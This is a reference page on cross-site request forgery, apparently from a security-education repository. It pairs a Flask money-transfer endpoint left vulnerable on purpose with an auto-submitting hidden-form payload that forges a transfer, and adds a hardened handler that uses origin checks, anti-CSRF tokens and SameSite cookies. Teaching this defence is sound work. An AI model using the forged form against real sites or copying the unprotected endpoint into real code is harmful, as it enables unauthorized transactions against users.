qeeqbox/cross-site-request-forgery
A threat actor may trick an authenticated or trusted victim into executing unauthorized actions on their behalf.

Example #1

  1. Threat actor crafts an exploit URL for a fund transfer from a vulnerable website
  2. Bob logs in to the vulnerable website (Bob is authenticated - session cookie is saved)
  3. Threat actor tricks Bob into clicking on the exploit URL
  4. Bob clicks on the exploit URL
  5. Bob's browser loads the session cookie and performs a fund transfer

Code

Target-Logic

from flask import Flask, request, make_response
from flask_login import login_required, current_user

app = Flask(__name__)

@app.route("/send_money", methods=["POST"])
@login_required
def send_money():
   ...
   # Vulnerable by design: nothing ties this POST to a form the site itself served.
   # Any page that makes Bob's browser submit here rides on his session cookie.
   amount = int(request.form.get("amount"))
   to_user = get_user(request.form.get("to_user"))   # get_user: the app's own lookup (elided above)
   if current_user:
      if current_user['balance'] >= amount:          # sender must hold at least the amount
         current_user['balance'] -= amount
         to_user['balance'] += amount
         return make_response({"transfer":"success"}, 200)
   return make_response({"transfer":"failed"}, 200)

Victim-Executes

<html>
  <body>
    <form action="https://test.local/send_money" method="POST">
      <input type="hidden" name="amount" value="1000"/>
      <input type="hidden" name="to_user" value="ABC-999"/>
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Target-In

amount=1000
to_user=ABC-999

Target-Output

{"transfer":"success"}

Impact

Varies

Risk

  • Read & modify data
  • Execute commands

Redemption

  • Header verification
  • Challenge-response
  • Anti-CSRF tokens
  • Same-site cookies
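The following is an added example, not code from the qeeqbox repository: a framework-free Python sketch of the page's send_money handler with three of the listed mitigations applied (Origin/Referer header verification, a per-session anti-CSRF token compared in constant time, and a SameSite=Strict session cookie). The request is passed in as plain dicts so it runs without Flask; SITE_ORIGIN reuses the page's https://test.local, while the attacker origin, user ids and balances are constructed sample values.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# The origin that legitimately serves the transfer form (taken from the page's example).
SITE_ORIGIN = "https://test.local"


def issue_csrf_token(session):
    """Anti-CSRF token: a random per-session secret that a third-party page cannot read.
    It is kept in the server-side session and embedded in the site's own form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers):
    """Header verification: browsers set Origin (or at least Referer) on cross-site form
    posts and the submitting page cannot override them. Fail closed when both are absent."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def csrf_token_valid(session, form):
    """Compare the submitted token with the session's token in constant time."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def session_cookie_header(session_id):
    """Same-site cookie: with SameSite=Strict the browser does not attach the session
    cookie to requests initiated from another site, so step 5 of the page's example
    arrives unauthenticated. Secure and HttpOnly are the usual companions."""
    return f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Strict"


def send_money(session, headers, form, users):
    """Hardened counterpart of the page's send_money handler (hypothetical; the page's
    handler is Flask, this one takes dicts). `session` is the logged-in user's server-side
    session, `users` maps user id -> account record."""
    if not origin_allowed(headers):
        return {"transfer": "failed", "reason": "origin"}
    if not csrf_token_valid(session, form):
        return {"transfer": "failed", "reason": "csrf_token"}
    sender = users.get(session.get("user_id"))
    to_user = users.get(form.get("to_user"))
    try:
        amount = int(form.get("amount", ""))
    except ValueError:
        return {"transfer": "failed", "reason": "amount"}
    if sender is None or to_user is None or amount <= 0:
        return {"transfer": "failed", "reason": "input"}
    if sender["balance"] < amount:
        return {"transfer": "failed", "reason": "balance"}
    sender["balance"] -= amount
    to_user["balance"] += amount
    return {"transfer": "success"}


def demo():
    """Replay the page's scenario against the hardened handler (constructed sample data)."""
    users = {"bob": {"balance": 5000}, "ABC-999": {"balance": 0}}
    session = {"user_id": "bob"}
    token = issue_csrf_token(session)

    # The page's auto-submitting form, posted from a third-party page: foreign Origin, no token.
    forged = send_money(session,
                        {"Origin": "https://attacker.example"},  # constructed attacker origin
                        {"amount": "1000", "to_user": "ABC-999"},
                        users)

    # Bob's own form on test.local carries the token and a matching Origin.
    legit = send_money(session,
                       {"Origin": SITE_ORIGIN},
                       {"amount": "1000", "to_user": "ABC-999", "csrf_token": token},
                       users)
    return forged, legit, users["bob"]["balance"]


if __name__ == "__main__":
    print(demo())
```

The checks are layered on purpose: SameSite=Strict stops the cookie from being sent at all, the Origin check rejects the request if it arrives anyway, and the token check catches the case where neither header is present or a client strips them. Each one alone has gaps (old browsers, Referer suppression), together they cover the example on the page.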

Names

  • XSRF
  • Sea Surf
  • Session Riding
  • Cross-site reference forgery
  • Hostile linking

ID

776dd60c-c1de-46a3-a104-25cd836e24b6
